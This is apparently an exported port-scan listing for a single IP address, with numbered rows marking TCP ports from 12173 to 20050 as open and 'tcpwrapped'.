10439149.126.72.220 12173 tcp tcpwrapped open
10440149.126.72.220 12174 tcp tcpwrapped open
10441149.126.72.220 12175 tcp tcpwrapped open
10442149.126.72.220 12176 tcp tcpwrapped open
10443149.126.72.220 12177 tcp tcpwrapped open
10444149.126.72.220 12178 tcp tcpwrapped open
10445149.126.72.220 12179 tcp tcpwrapped open
10446149.126.72.220 12180 tcp tcpwrapped open
10447149.126.72.220 12181 tcp tcpwrapped open
10448149.126.72.220 12182 tcp tcpwrapped open
10449149.126.72.220 12183 tcp tcpwrapped open
10450149.126.72.220 12184 tcp tcpwrapped open
10451149.126.72.220 12185 tcp tcpwrapped open
10452149.126.72.220 12186 tcp tcpwrapped open
10453149.126.72.220 12187 tcp tcpwrapped open
10454149.126.72.220 12188 tcp tcpwrapped open
10455149.126.72.220 12189 tcp tcpwrapped open
10456149.126.72.220 12190 tcp tcpwrapped open
10457149.126.72.220 12191 tcp tcpwrapped open
10458149.126.72.220 12192 tcp tcpwrapped open
10459149.126.72.220 12193 tcp tcpwrapped open
10460149.126.72.220 12194 tcp tcpwrapped open
10461149.126.72.220 12195 tcp tcpwrapped open
10462149.126.72.220 12196 tcp tcpwrapped open
10463149.126.72.220 12197 tcp tcpwrapped open
10464149.126.72.220 12198 tcp tcpwrapped open
10465149.126.72.220 12199 tcp tcpwrapped open
10466149.126.72.220 12200 tcp tcpwrapped open
10467149.126.72.220 12201 tcp tcpwrapped open
10468149.126.72.220 12202 tcp tcpwrapped open
10469149.126.72.220 12203 tcp tcpwrapped open
10470149.126.72.220 12204 tcp tcpwrapped open
10471149.126.72.220 12205 tcp tcpwrapped open
10472149.126.72.220 12206 tcp tcpwrapped open
10473149.126.72.220 12207 tcp tcpwrapped open
10474149.126.72.220 12208 tcp tcpwrapped open
10475149.126.72.220 12209 tcp tcpwrapped open
10476149.126.72.220 12210 tcp tcpwrapped open
10477149.126.72.220 12211 tcp tcpwrapped open
10478149.126.72.220 12212 tcp tcpwrapped open
10479149.126.72.220 12213 tcp tcpwrapped open
10480149.126.72.220 12214 tcp tcpwrapped open
10481149.126.72.220 12215 tcp tcpwrapped open
10482149.126.72.220 12216 tcp tcpwrapped open
10483149.126.72.220 12217 tcp tcpwrapped open
10484149.126.72.220 12218 tcp tcpwrapped open
10485149.126.72.220 12219 tcp tcpwrapped open
10486149.126.72.220 12220 tcp tcpwrapped open
10487149.126.72.220 12221 tcp tcpwrapped open
10488149.126.72.220 12222 tcp tcpwrapped open
10489149.126.72.220 12223 tcp tcpwrapped open
10490149.126.72.220 12224 tcp tcpwrapped open
10491149.126.72.220 12225 tcp tcpwrapped open
10492149.126.72.220 12226 tcp tcpwrapped open
10493149.126.72.220 12227 tcp tcpwrapped open
10494149.126.72.220 12228 tcp tcpwrapped open
10495149.126.72.220 12229 tcp tcpwrapped open
10496149.126.72.220 12230 tcp tcpwrapped open
10497149.126.72.220 12231 tcp tcpwrapped open
10498149.126.72.220 12232 tcp tcpwrapped open
10499149.126.72.220 12233 tcp tcpwrapped open
10500149.126.72.220 12234 tcp tcpwrapped open
10501149.126.72.220 12235 tcp tcpwrapped open
10502149.126.72.220 12236 tcp tcpwrapped open
10503149.126.72.220 12237 tcp tcpwrapped open
10504149.126.72.220 12238 tcp tcpwrapped open
10505149.126.72.220 12239 tcp tcpwrapped open
10506149.126.72.220 12240 tcp tcpwrapped open
10507149.126.72.220 12241 tcp tcpwrapped open
10508149.126.72.220 12242 tcp tcpwrapped open
10509149.126.72.220 12243 tcp tcpwrapped open
10510149.126.72.220 12244 tcp tcpwrapped open
10511149.126.72.220 12245 tcp tcpwrapped open
10512149.126.72.220 12246 tcp tcpwrapped open
10513149.126.72.220 12247 tcp tcpwrapped open
10514149.126.72.220 12248 tcp tcpwrapped open
10515149.126.72.220 12249 tcp tcpwrapped open
10516149.126.72.220 12250 tcp tcpwrapped open
10517149.126.72.220 12251 tcp tcpwrapped open
10518149.126.72.220 12252 tcp tcpwrapped open
10519149.126.72.220 12253 tcp tcpwrapped open
10520149.126.72.220 12254 tcp tcpwrapped open
10521149.126.72.220 12255 tcp tcpwrapped open
10522149.126.72.220 12256 tcp tcpwrapped open
10523149.126.72.220 12257 tcp tcpwrapped open
10524149.126.72.220 12258 tcp tcpwrapped open
10525149.126.72.220 12259 tcp tcpwrapped open
10526149.126.72.220 12260 tcp tcpwrapped open
10527149.126.72.220 12261 tcp tcpwrapped open
10528149.126.72.220 12262 tcp tcpwrapped open
10529149.126.72.220 12263 tcp tcpwrapped open
10530149.126.72.220 12264 tcp tcpwrapped open
10531149.126.72.220 12265 tcp tcpwrapped open
10532149.126.72.220 12266 tcp tcpwrapped open
10533149.126.72.220 12267 tcp tcpwrapped open
10534149.126.72.220 12268 tcp tcpwrapped open
10535149.126.72.220 12269 tcp tcpwrapped open
10536149.126.72.220 12270 tcp tcpwrapped open
10537149.126.72.220 12271 tcp tcpwrapped open
10538149.126.72.220 12272 tcp tcpwrapped open
10539149.126.72.220 12273 tcp tcpwrapped open
10540149.126.72.220 12274 tcp tcpwrapped open
10541149.126.72.220 12275 tcp tcpwrapped open
10542149.126.72.220 12276 tcp tcpwrapped open
10543149.126.72.220 12277 tcp tcpwrapped open
10544149.126.72.220 12278 tcp tcpwrapped open
10545149.126.72.220 12279 tcp tcpwrapped open
10546149.126.72.220 12280 tcp tcpwrapped open
10547149.126.72.220 12281 tcp tcpwrapped open
10548149.126.72.220 12282 tcp tcpwrapped open
10549149.126.72.220 12283 tcp tcpwrapped open
10550149.126.72.220 12284 tcp tcpwrapped open
10551149.126.72.220 12285 tcp tcpwrapped open
10552149.126.72.220 12286 tcp tcpwrapped open
10553149.126.72.220 12287 tcp tcpwrapped open
10554149.126.72.220 12288 tcp tcpwrapped open
10555149.126.72.220 12289 tcp tcpwrapped open
10556149.126.72.220 12290 tcp tcpwrapped open
10557149.126.72.220 12291 tcp tcpwrapped open
10558149.126.72.220 12292 tcp tcpwrapped open
10559149.126.72.220 12293 tcp tcpwrapped open
10560149.126.72.220 12294 tcp tcpwrapped open
10561149.126.72.220 12295 tcp tcpwrapped open
10562149.126.72.220 12296 tcp tcpwrapped open
10563149.126.72.220 12297 tcp tcpwrapped open
10564149.126.72.220 12298 tcp tcpwrapped open
10565149.126.72.220 12299 tcp tcpwrapped open
10566149.126.72.220 12300 tcp tcpwrapped open
10567149.126.72.220 12301 tcp tcpwrapped open
10568149.126.72.220 12302 tcp tcpwrapped open
10569149.126.72.220 12303 tcp tcpwrapped open
10570149.126.72.220 12304 tcp tcpwrapped open
10571149.126.72.220 12305 tcp tcpwrapped open
10572149.126.72.220 12306 tcp tcpwrapped open
10573149.126.72.220 12307 tcp tcpwrapped open
10574149.126.72.220 12308 tcp tcpwrapped open
10575149.126.72.220 12309 tcp tcpwrapped open
10576149.126.72.220 12310 tcp tcpwrapped open
10577149.126.72.220 12311 tcp tcpwrapped open
10578149.126.72.220 12312 tcp tcpwrapped open
10579149.126.72.220 12313 tcp tcpwrapped open
10580149.126.72.220 12314 tcp tcpwrapped open
10581149.126.72.220 12315 tcp tcpwrapped open
10582149.126.72.220 12316 tcp tcpwrapped open
10583149.126.72.220 12317 tcp tcpwrapped open
10584149.126.72.220 12318 tcp tcpwrapped open
10585149.126.72.220 12319 tcp tcpwrapped open
10586149.126.72.220 12320 tcp tcpwrapped open
10587149.126.72.220 12321 tcp tcpwrapped open
10588149.126.72.220 12322 tcp tcpwrapped open
10589149.126.72.220 12323 tcp tcpwrapped open
10590149.126.72.220 12324 tcp tcpwrapped open
10591149.126.72.220 12325 tcp tcpwrapped open
10592149.126.72.220 12326 tcp tcpwrapped open
10593149.126.72.220 12327 tcp tcpwrapped open
10594149.126.72.220 12328 tcp tcpwrapped open
10595149.126.72.220 12329 tcp tcpwrapped open
10596149.126.72.220 12330 tcp tcpwrapped open
10597149.126.72.220 12331 tcp tcpwrapped open
10598149.126.72.220 12332 tcp tcpwrapped open
10599149.126.72.220 12333 tcp tcpwrapped open
10600149.126.72.220 12334 tcp tcpwrapped open
10601149.126.72.220 12335 tcp tcpwrapped open
10602149.126.72.220 12336 tcp tcpwrapped open
10603149.126.72.220 12337 tcp tcpwrapped open
10604149.126.72.220 12338 tcp tcpwrapped open
10605149.126.72.220 12339 tcp tcpwrapped open
10606149.126.72.220 12340 tcp tcpwrapped open
10607149.126.72.220 12341 tcp tcpwrapped open
10608149.126.72.220 12342 tcp tcpwrapped open
10609149.126.72.220 12343 tcp tcpwrapped open
10610149.126.72.220 12344 tcp tcpwrapped open
10611149.126.72.220 12345 tcp tcpwrapped open
10612149.126.72.220 12346 tcp tcpwrapped open
10613149.126.72.220 12347 tcp tcpwrapped open
10614149.126.72.220 12348 tcp tcpwrapped open
10615149.126.72.220 12349 tcp tcpwrapped open
10616149.126.72.220 12350 tcp tcpwrapped open
10617149.126.72.220 12351 tcp tcpwrapped open
10618149.126.72.220 12352 tcp tcpwrapped open
10619149.126.72.220 12353 tcp tcpwrapped open
10620149.126.72.220 12354 tcp tcpwrapped open
10621149.126.72.220 12355 tcp tcpwrapped open
10622149.126.72.220 12356 tcp tcpwrapped open
10623149.126.72.220 12357 tcp tcpwrapped open
10624149.126.72.220 12358 tcp tcpwrapped open
10625149.126.72.220 12359 tcp tcpwrapped open
10626149.126.72.220 12360 tcp tcpwrapped open
10627149.126.72.220 12361 tcp tcpwrapped open
10628149.126.72.220 12362 tcp tcpwrapped open
10629149.126.72.220 12363 tcp tcpwrapped open
10630149.126.72.220 12364 tcp tcpwrapped open
10631149.126.72.220 12365 tcp tcpwrapped open
10632149.126.72.220 12366 tcp tcpwrapped open
10633149.126.72.220 12367 tcp tcpwrapped open
10634149.126.72.220 12368 tcp tcpwrapped open
10635149.126.72.220 12369 tcp tcpwrapped open
10636149.126.72.220 12370 tcp tcpwrapped open
10637149.126.72.220 12371 tcp tcpwrapped open
10638149.126.72.220 12372 tcp tcpwrapped open
10639149.126.72.220 12373 tcp tcpwrapped open
10640149.126.72.220 12374 tcp tcpwrapped open
10641149.126.72.220 12375 tcp tcpwrapped open
10642149.126.72.220 12376 tcp tcpwrapped open
10643149.126.72.220 12377 tcp tcpwrapped open
10644149.126.72.220 12378 tcp tcpwrapped open
10645149.126.72.220 12379 tcp tcpwrapped open
10646149.126.72.220 12380 tcp tcpwrapped open
10647149.126.72.220 12381 tcp tcpwrapped open
10648149.126.72.220 12382 tcp tcpwrapped open
10649149.126.72.220 12383 tcp tcpwrapped open
10650149.126.72.220 12384 tcp tcpwrapped open
10651149.126.72.220 12385 tcp tcpwrapped open
10652149.126.72.220 12386 tcp tcpwrapped open
10653149.126.72.220 12387 tcp tcpwrapped open
10654149.126.72.220 12388 tcp tcpwrapped open
10655149.126.72.220 12389 tcp tcpwrapped open
10656149.126.72.220 12390 tcp tcpwrapped open
10657149.126.72.220 12391 tcp tcpwrapped open
10658149.126.72.220 12392 tcp tcpwrapped open
10659149.126.72.220 12393 tcp tcpwrapped open
10660149.126.72.220 12394 tcp tcpwrapped open
10661149.126.72.220 12395 tcp tcpwrapped open
10662149.126.72.220 12396 tcp tcpwrapped open
10663149.126.72.220 12397 tcp tcpwrapped open
10664149.126.72.220 12398 tcp tcpwrapped open
10665149.126.72.220 12399 tcp tcpwrapped open
10666149.126.72.220 12400 tcp tcpwrapped open
10667149.126.72.220 12401 tcp tcpwrapped open
10668149.126.72.220 12402 tcp tcpwrapped open
10669149.126.72.220 12403 tcp tcpwrapped open
10670149.126.72.220 12404 tcp tcpwrapped open
10671149.126.72.220 12405 tcp tcpwrapped open
10672149.126.72.220 12406 tcp tcpwrapped open
10673149.126.72.220 12407 tcp tcpwrapped open
10674149.126.72.220 12408 tcp tcpwrapped open
10675149.126.72.220 12409 tcp tcpwrapped open
10676149.126.72.220 12410 tcp tcpwrapped open
10677149.126.72.220 12411 tcp tcpwrapped open
10678149.126.72.220 12412 tcp tcpwrapped open
10679149.126.72.220 12413 tcp tcpwrapped open
10680149.126.72.220 12414 tcp tcpwrapped open
10681149.126.72.220 12415 tcp tcpwrapped open
10682149.126.72.220 12416 tcp tcpwrapped open
10683149.126.72.220 12417 tcp tcpwrapped open
10684149.126.72.220 12418 tcp tcpwrapped open
10685149.126.72.220 12419 tcp tcpwrapped open
10686149.126.72.220 12420 tcp tcpwrapped open
10687149.126.72.220 12421 tcp tcpwrapped open
10688149.126.72.220 12422 tcp tcpwrapped open
10689149.126.72.220 12423 tcp tcpwrapped open
10690149.126.72.220 12424 tcp tcpwrapped open
10691149.126.72.220 12425 tcp tcpwrapped open
10692149.126.72.220 12426 tcp tcpwrapped open
10693149.126.72.220 12427 tcp tcpwrapped open
10694149.126.72.220 12428 tcp tcpwrapped open
10695149.126.72.220 12429 tcp tcpwrapped open
10696149.126.72.220 12430 tcp tcpwrapped open
10697149.126.72.220 12431 tcp tcpwrapped open
10698149.126.72.220 12432 tcp tcpwrapped open
10699149.126.72.220 12433 tcp tcpwrapped open
10700149.126.72.220 12434 tcp tcpwrapped open
10701149.126.72.220 12435 tcp tcpwrapped open
10702149.126.72.220 12436 tcp tcpwrapped open
10703149.126.72.220 12437 tcp tcpwrapped open
10704149.126.72.220 12438 tcp tcpwrapped open
10705149.126.72.220 12439 tcp tcpwrapped open
10706149.126.72.220 12440 tcp tcpwrapped open
10707149.126.72.220 12441 tcp tcpwrapped open
10708149.126.72.220 12442 tcp tcpwrapped open
10709149.126.72.220 12443 tcp tcpwrapped open
10710149.126.72.220 12444 tcp tcpwrapped open
10711149.126.72.220 12445 tcp tcpwrapped open
10712149.126.72.220 12446 tcp tcpwrapped open
10713149.126.72.220 12447 tcp tcpwrapped open
10714149.126.72.220 12448 tcp tcpwrapped open
10715149.126.72.220 12449 tcp tcpwrapped open
10716149.126.72.220 12450 tcp tcpwrapped open
10717149.126.72.220 12451 tcp tcpwrapped open
10718149.126.72.220 12452 tcp tcpwrapped open
10719149.126.72.220 12453 tcp tcpwrapped open
10720149.126.72.220 12454 tcp tcpwrapped open
10721149.126.72.220 12455 tcp tcpwrapped open
10722149.126.72.220 12456 tcp tcpwrapped open
10723149.126.72.220 12457 tcp tcpwrapped open
10724149.126.72.220 12458 tcp tcpwrapped open
10725149.126.72.220 12459 tcp tcpwrapped open
10726149.126.72.220 12460 tcp tcpwrapped open
10727149.126.72.220 12461 tcp tcpwrapped open
10728149.126.72.220 12462 tcp tcpwrapped open
10729149.126.72.220 12463 tcp tcpwrapped open
10730149.126.72.220 12464 tcp tcpwrapped open
10731149.126.72.220 12465 tcp tcpwrapped open
10732149.126.72.220 12466 tcp tcpwrapped open
10733149.126.72.220 12467 tcp tcpwrapped open
10734149.126.72.220 12468 tcp tcpwrapped open
10735149.126.72.220 12469 tcp tcpwrapped open
10736149.126.72.220 12470 tcp tcpwrapped open
10737149.126.72.220 12471 tcp tcpwrapped open
10738149.126.72.220 12472 tcp tcpwrapped open
10739149.126.72.220 12473 tcp tcpwrapped open
10740149.126.72.220 12474 tcp tcpwrapped open
10741149.126.72.220 12475 tcp tcpwrapped open
10742149.126.72.220 12476 tcp tcpwrapped open
10743149.126.72.220 12477 tcp tcpwrapped open
10744149.126.72.220 12478 tcp tcpwrapped open
10745149.126.72.220 12479 tcp tcpwrapped open
10746149.126.72.220 12480 tcp tcpwrapped open
10747149.126.72.220 12481 tcp tcpwrapped open
10748149.126.72.220 12482 tcp tcpwrapped open
10749149.126.72.220 12483 tcp tcpwrapped open
10750149.126.72.220 12484 tcp tcpwrapped open
10751149.126.72.220 12485 tcp tcpwrapped open
10752149.126.72.220 12486 tcp tcpwrapped open
10753149.126.72.220 12487 tcp tcpwrapped open
10754149.126.72.220 12488 tcp tcpwrapped open
10755149.126.72.220 12489 tcp tcpwrapped open
10756149.126.72.220 12490 tcp tcpwrapped open
10757149.126.72.220 12491 tcp tcpwrapped open
10758149.126.72.220 12492 tcp tcpwrapped open
10759149.126.72.220 12493 tcp tcpwrapped open
10760149.126.72.220 12494 tcp tcpwrapped open
10761149.126.72.220 12495 tcp tcpwrapped open
10762149.126.72.220 12496 tcp tcpwrapped open
10763149.126.72.220 12497 tcp tcpwrapped open
10764149.126.72.220 12498 tcp tcpwrapped open
10765149.126.72.220 12499 tcp tcpwrapped open
10766149.126.72.220 12500 tcp tcpwrapped open
10767149.126.72.220 12501 tcp tcpwrapped open
10768149.126.72.220 12502 tcp tcpwrapped open
10769149.126.72.220 12503 tcp tcpwrapped open
10770149.126.72.220 12504 tcp tcpwrapped open
10771149.126.72.220 12505 tcp tcpwrapped open
10772149.126.72.220 12506 tcp tcpwrapped open
10773149.126.72.220 12507 tcp tcpwrapped open
10774149.126.72.220 12508 tcp tcpwrapped open
10775149.126.72.220 12509 tcp tcpwrapped open
10776149.126.72.220 12510 tcp tcpwrapped open
10777149.126.72.220 12511 tcp tcpwrapped open
10778149.126.72.220 12512 tcp tcpwrapped open
10779149.126.72.220 12513 tcp tcpwrapped open
10780149.126.72.220 12514 tcp tcpwrapped open
10781149.126.72.220 12515 tcp tcpwrapped open
10782149.126.72.220 12516 tcp tcpwrapped open
10783149.126.72.220 12517 tcp tcpwrapped open
10784149.126.72.220 12518 tcp tcpwrapped open
10785149.126.72.220 12519 tcp tcpwrapped open
10786149.126.72.220 12520 tcp tcpwrapped open
10787149.126.72.220 12521 tcp tcpwrapped open
10788149.126.72.220 12522 tcp tcpwrapped open
10789149.126.72.220 12523 tcp tcpwrapped open
10790149.126.72.220 12524 tcp tcpwrapped open
10791149.126.72.220 12525 tcp tcpwrapped open
10792149.126.72.220 12526 tcp tcpwrapped open
10793149.126.72.220 12527 tcp tcpwrapped open
10794149.126.72.220 12528 tcp tcpwrapped open
10795149.126.72.220 12529 tcp tcpwrapped open
10796149.126.72.220 12530 tcp tcpwrapped open
10797149.126.72.220 12531 tcp tcpwrapped open
10798149.126.72.220 12532 tcp tcpwrapped open
10799149.126.72.220 12533 tcp tcpwrapped open
10800149.126.72.220 12534 tcp tcpwrapped open
10801149.126.72.220 12535 tcp tcpwrapped open
10802149.126.72.220 12536 tcp tcpwrapped open
10803149.126.72.220 12537 tcp tcpwrapped open
10804149.126.72.220 12538 tcp tcpwrapped open
10805149.126.72.220 12539 tcp tcpwrapped open
10806149.126.72.220 12540 tcp tcpwrapped open
10807149.126.72.220 12541 tcp tcpwrapped open
10808149.126.72.220 12542 tcp tcpwrapped open
10809149.126.72.220 12543 tcp tcpwrapped open
10810149.126.72.220 12544 tcp tcpwrapped open
10811149.126.72.220 12545 tcp tcpwrapped open
10812149.126.72.220 12546 tcp tcpwrapped open
10813149.126.72.220 12547 tcp tcpwrapped open
10814149.126.72.220 12548 tcp tcpwrapped open
10815149.126.72.220 12549 tcp tcpwrapped open
10816149.126.72.220 12550 tcp tcpwrapped open
10817149.126.72.220 12551 tcp tcpwrapped open
10818149.126.72.220 12552 tcp tcpwrapped open
10819149.126.72.220 12553 tcp tcpwrapped open
10820149.126.72.220 12554 tcp tcpwrapped open
10821149.126.72.220 12555 tcp tcpwrapped open
10822149.126.72.220 12556 tcp tcpwrapped open
10823149.126.72.220 12557 tcp tcpwrapped open
10824149.126.72.220 12558 tcp tcpwrapped open
10825149.126.72.220 12559 tcp tcpwrapped open
10826149.126.72.220 12560 tcp tcpwrapped open
10827149.126.72.220 12561 tcp tcpwrapped open
10828149.126.72.220 12562 tcp tcpwrapped open
10829149.126.72.220 12563 tcp tcpwrapped open
10830149.126.72.220 12564 tcp tcpwrapped open
10831149.126.72.220 12565 tcp tcpwrapped open
10832149.126.72.220 12566 tcp tcpwrapped open
10833149.126.72.220 12567 tcp tcpwrapped open
10834149.126.72.220 12568 tcp tcpwrapped open
10835149.126.72.220 12569 tcp tcpwrapped open
10836149.126.72.220 12570 tcp tcpwrapped open
10837149.126.72.220 12571 tcp tcpwrapped open
10838149.126.72.220 12572 tcp tcpwrapped open
10839149.126.72.220 12573 tcp tcpwrapped open
10840149.126.72.220 12574 tcp tcpwrapped open
10841149.126.72.220 12575 tcp tcpwrapped open
10842149.126.72.220 12576 tcp tcpwrapped open
10843149.126.72.220 12577 tcp tcpwrapped open
10844149.126.72.220 12578 tcp tcpwrapped open
10845149.126.72.220 12579 tcp tcpwrapped open
10846149.126.72.220 12580 tcp tcpwrapped open
10847149.126.72.220 12581 tcp tcpwrapped open
10848149.126.72.220 12582 tcp tcpwrapped open
10849149.126.72.220 12583 tcp tcpwrapped open
10850149.126.72.220 12584 tcp tcpwrapped open
10851149.126.72.220 12585 tcp tcpwrapped open
10852149.126.72.220 12586 tcp tcpwrapped open
10853149.126.72.220 12587 tcp tcpwrapped open
10854149.126.72.220 12588 tcp tcpwrapped open
10855149.126.72.220 12589 tcp tcpwrapped open
10856149.126.72.220 12590 tcp tcpwrapped open
10857149.126.72.220 13082 tcp tcpwrapped open
10858149.126.72.220 13084 tcp tcpwrapped open
10859149.126.72.220 13333 tcp tcpwrapped open
10860149.126.72.220 13443 tcp tcpwrapped open
10861149.126.72.220 14006 tcp tcpwrapped open
10862149.126.72.220 14082 tcp tcpwrapped open
10863149.126.72.220 14084 tcp tcpwrapped open
10864149.126.72.220 14104 tcp tcpwrapped open
10865149.126.72.220 14130 tcp tcpwrapped open
10866149.126.72.220 14182 tcp tcpwrapped open
10867149.126.72.220 14184 tcp tcpwrapped open
10868149.126.72.220 14330 tcp tcpwrapped open
10869149.126.72.220 14443 tcp tcpwrapped open
10870149.126.72.220 14825 tcp tcpwrapped open
10871149.126.72.220 15002 tcp tcpwrapped open
10872149.126.72.220 15006 tcp tcpwrapped open
10873149.126.72.220 15082 tcp tcpwrapped open
10874149.126.72.220 15084 tcp tcpwrapped open
10875149.126.72.220 15151 tcp tcpwrapped open
10876149.126.72.220 15555 tcp tcpwrapped open
10877149.126.72.220 16000 tcp tcpwrapped open
10878149.126.72.220 16001 tcp tcpwrapped open
10879149.126.72.220 16015 tcp tcpwrapped open
10880149.126.72.220 16016 tcp tcpwrapped open
10881149.126.72.220 16017 tcp tcpwrapped open
10882149.126.72.220 16082 tcp tcpwrapped open
10883149.126.72.220 16084 tcp tcpwrapped open
10884149.126.72.220 16311 tcp tcpwrapped open
10885149.126.72.220 16316 tcp tcpwrapped open
10886149.126.72.220 16443 tcp tcpwrapped open
10887149.126.72.220 16800 tcp tcpwrapped open
10888149.126.72.220 16888 tcp tcpwrapped open
10889149.126.72.220 17082 tcp tcpwrapped open
10890149.126.72.220 17084 tcp tcpwrapped open
10891149.126.72.220 17182 tcp tcpwrapped open
10892149.126.72.220 17184 tcp tcpwrapped open
10893149.126.72.220 17770 tcp tcpwrapped open
10894149.126.72.220 17771 tcp tcpwrapped open
10895149.126.72.220 17772 tcp tcpwrapped open
10896149.126.72.220 17773 tcp tcpwrapped open
10897149.126.72.220 17774 tcp tcpwrapped open
10898149.126.72.220 17775 tcp tcpwrapped open
10899149.126.72.220 17776 tcp tcpwrapped open
10900149.126.72.220 17777 tcp tcpwrapped open
10901149.126.72.220 17778 tcp tcpwrapped open
10902149.126.72.220 17779 tcp tcpwrapped open
10903149.126.72.220 17780 tcp tcpwrapped open
10904149.126.72.220 18000 tcp tcpwrapped open
10905149.126.72.220 18001 tcp tcpwrapped open
10906149.126.72.220 18002 tcp tcpwrapped open
10907149.126.72.220 18003 tcp tcpwrapped open
10908149.126.72.220 18004 tcp tcpwrapped open
10909149.126.72.220 18005 tcp tcpwrapped open
10910149.126.72.220 18006 tcp tcpwrapped open
10911149.126.72.220 18007 tcp tcpwrapped open
10912149.126.72.220 18008 tcp tcpwrapped open
10913149.126.72.220 18009 tcp tcpwrapped open
10914149.126.72.220 18010 tcp tcpwrapped open
10915149.126.72.220 18011 tcp tcpwrapped open
10916149.126.72.220 18012 tcp tcpwrapped open
10917149.126.72.220 18013 tcp tcpwrapped open
10918149.126.72.220 18014 tcp tcpwrapped open
10919149.126.72.220 18015 tcp tcpwrapped open
10920149.126.72.220 18016 tcp tcpwrapped open
10921149.126.72.220 18017 tcp tcpwrapped open
10922149.126.72.220 18018 tcp tcpwrapped open
10923149.126.72.220 18019 tcp tcpwrapped open
10924149.126.72.220 18020 tcp tcpwrapped open
10925149.126.72.220 18021 tcp tcpwrapped open
10926149.126.72.220 18022 tcp tcpwrapped open
10927149.126.72.220 18023 tcp tcpwrapped open
10928149.126.72.220 18024 tcp tcpwrapped open
10929149.126.72.220 18025 tcp tcpwrapped open
10930149.126.72.220 18026 tcp tcpwrapped open
10931149.126.72.220 18027 tcp tcpwrapped open
10932149.126.72.220 18028 tcp tcpwrapped open
10933149.126.72.220 18029 tcp tcpwrapped open
10934149.126.72.220 18030 tcp tcpwrapped open
10935149.126.72.220 18031 tcp tcpwrapped open
10936149.126.72.220 18032 tcp tcpwrapped open
10937149.126.72.220 18033 tcp tcpwrapped open
10938149.126.72.220 18034 tcp tcpwrapped open
10939149.126.72.220 18035 tcp tcpwrapped open
10940149.126.72.220 18036 tcp tcpwrapped open
10941149.126.72.220 18037 tcp tcpwrapped open
10942149.126.72.220 18038 tcp tcpwrapped open
10943149.126.72.220 18039 tcp tcpwrapped open
10944149.126.72.220 18040 tcp tcpwrapped open
10945149.126.72.220 18041 tcp tcpwrapped open
10946149.126.72.220 18042 tcp tcpwrapped open
10947149.126.72.220 18043 tcp tcpwrapped open
10948149.126.72.220 18044 tcp tcpwrapped open
10949149.126.72.220 18045 tcp tcpwrapped open
10950149.126.72.220 18046 tcp tcpwrapped open
10951149.126.72.220 18047 tcp tcpwrapped open
10952149.126.72.220 18048 tcp tcpwrapped open
10953149.126.72.220 18049 tcp tcpwrapped open
10954149.126.72.220 18050 tcp tcpwrapped open
10955149.126.72.220 18051 tcp tcpwrapped open
10956149.126.72.220 18052 tcp tcpwrapped open
10957149.126.72.220 18053 tcp tcpwrapped open
10958149.126.72.220 18054 tcp tcpwrapped open
10959149.126.72.220 18055 tcp tcpwrapped open
10960149.126.72.220 18056 tcp tcpwrapped open
10961149.126.72.220 18057 tcp tcpwrapped open
10962149.126.72.220 18058 tcp tcpwrapped open
10963149.126.72.220 18059 tcp tcpwrapped open
10964149.126.72.220 18060 tcp tcpwrapped open
10965149.126.72.220 18061 tcp tcpwrapped open
10966149.126.72.220 18062 tcp tcpwrapped open
10967149.126.72.220 18063 tcp tcpwrapped open
10968149.126.72.220 18064 tcp tcpwrapped open
10969149.126.72.220 18065 tcp tcpwrapped open
10970149.126.72.220 18066 tcp tcpwrapped open
10971149.126.72.220 18067 tcp tcpwrapped open
10972149.126.72.220 18068 tcp tcpwrapped open
10973149.126.72.220 18069 tcp tcpwrapped open
10974149.126.72.220 18070 tcp tcpwrapped open
10975149.126.72.220 18071 tcp tcpwrapped open
10976149.126.72.220 18072 tcp tcpwrapped open
10977149.126.72.220 18073 tcp tcpwrapped open
10978149.126.72.220 18074 tcp tcpwrapped open
10979149.126.72.220 18075 tcp tcpwrapped open
10980149.126.72.220 18076 tcp tcpwrapped open
10981149.126.72.220 18077 tcp tcpwrapped open
10982149.126.72.220 18078 tcp tcpwrapped open
10983149.126.72.220 18079 tcp tcpwrapped open
10984149.126.72.220 18080 tcp tcpwrapped open
10985149.126.72.220 18081 tcp tcpwrapped open
10986149.126.72.220 18082 tcp tcpwrapped open
10987149.126.72.220 18083 tcp tcpwrapped open
10988149.126.72.220 18084 tcp tcpwrapped open
10989149.126.72.220 18085 tcp tcpwrapped open
10990149.126.72.220 18086 tcp tcpwrapped open
10991149.126.72.220 18087 tcp tcpwrapped open
10992149.126.72.220 18088 tcp tcpwrapped open
10993149.126.72.220 18089 tcp tcpwrapped open
10994149.126.72.220 18090 tcp tcpwrapped open
10995149.126.72.220 18091 tcp tcpwrapped open
10996149.126.72.220 18092 tcp tcpwrapped open
10997149.126.72.220 18093 tcp tcpwrapped open
10998149.126.72.220 18094 tcp tcpwrapped open
10999149.126.72.220 18095 tcp tcpwrapped open
11000149.126.72.220 18096 tcp tcpwrapped open
11001149.126.72.220 18097 tcp tcpwrapped open
11002149.126.72.220 18098 tcp tcpwrapped open
11003149.126.72.220 18099 tcp tcpwrapped open
11004149.126.72.220 18100 tcp tcpwrapped open
11005149.126.72.220 18101 tcp tcpwrapped open
11006149.126.72.220 18102 tcp tcpwrapped open
11007149.126.72.220 18103 tcp tcpwrapped open
11008149.126.72.220 18104 tcp tcpwrapped open
11009149.126.72.220 18105 tcp tcpwrapped open
11010149.126.72.220 18106 tcp tcpwrapped open
11011149.126.72.220 18107 tcp tcpwrapped open
11012149.126.72.220 18108 tcp tcpwrapped open
11013149.126.72.220 18109 tcp tcpwrapped open
11014149.126.72.220 18110 tcp tcpwrapped open
11015149.126.72.220 18111 tcp tcpwrapped open
11016149.126.72.220 18112 tcp tcpwrapped open
11017149.126.72.220 18113 tcp tcpwrapped open
11018149.126.72.220 18200 tcp tcpwrapped open
11019149.126.72.220 18239 tcp tcpwrapped open
11020149.126.72.220 18443 tcp tcpwrapped open
11021149.126.72.220 18802 tcp tcpwrapped open
11022149.126.72.220 19013 tcp tcpwrapped open
11023149.126.72.220 19014 tcp tcpwrapped open
11024149.126.72.220 19015 tcp tcpwrapped open
11025149.126.72.220 19016 tcp tcpwrapped open
11026149.126.72.220 19017 tcp tcpwrapped open
11027149.126.72.220 19022 tcp tcpwrapped open
11028149.126.72.220 19080 tcp tcpwrapped open
11029149.126.72.220 19082 tcp tcpwrapped open
11030149.126.72.220 19084 tcp tcpwrapped open
11031149.126.72.220 19443 tcp tcpwrapped open
11032149.126.72.220 20000 tcp tcpwrapped open
11033149.126.72.220 20001 tcp tcpwrapped open
11034149.126.72.220 20010 tcp tcpwrapped open
11035149.126.72.220 20020 tcp tcpwrapped open
11036149.126.72.220 20030 tcp tcpwrapped open
11037149.126.72.220 20040 tcp tcpwrapped open
11038149.126.72.220 20050 tcp tcpwrapped open
